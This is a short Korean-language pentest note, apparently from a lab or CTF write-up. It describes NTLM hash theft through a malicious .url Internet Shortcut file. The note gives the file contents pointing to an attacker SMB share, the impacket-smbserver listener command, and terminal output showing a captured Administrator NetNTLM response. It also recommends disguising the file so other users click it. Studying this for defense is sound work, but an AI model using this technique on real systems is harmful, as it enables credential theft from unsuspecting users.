명령 실행을 하는 확장자가 존재합니다.
공격자의 서버로 NTLM 인증을 강제로 하게 함으로써 NTLM 챌린지 값을 탈취할 수 있습니다.
그럴듯한 파일로 올려두고, 다른 사용자가 클릭 시 해당 사용자의 NTLM 챌린지 값 탈취는 가능합니다.
# hack.url 파일 내용
[InternetShortcut]
URL=\\192.168.200.132\share
# 희생자가 파일을 클릭할 때까지 SMB 서버를 수신 상태로 대기
impacket-smbserver share . -smb2support
# 희생자가 url 파일 클릭 후 탈취에 성공한 NTLM 챌린지
┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-smbserver share . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.200.1,17309)
[*] AUTHENTICATE_MESSAGE (MicrosoftAccount\Administrator,wiki)
[*] User wiki\Administrator authenticated successfully
[*] Administrator::MicrosoftAccount:aaaaaaaaaaaaaaaa:04f496fa83c8060ebc3eb9bf248...
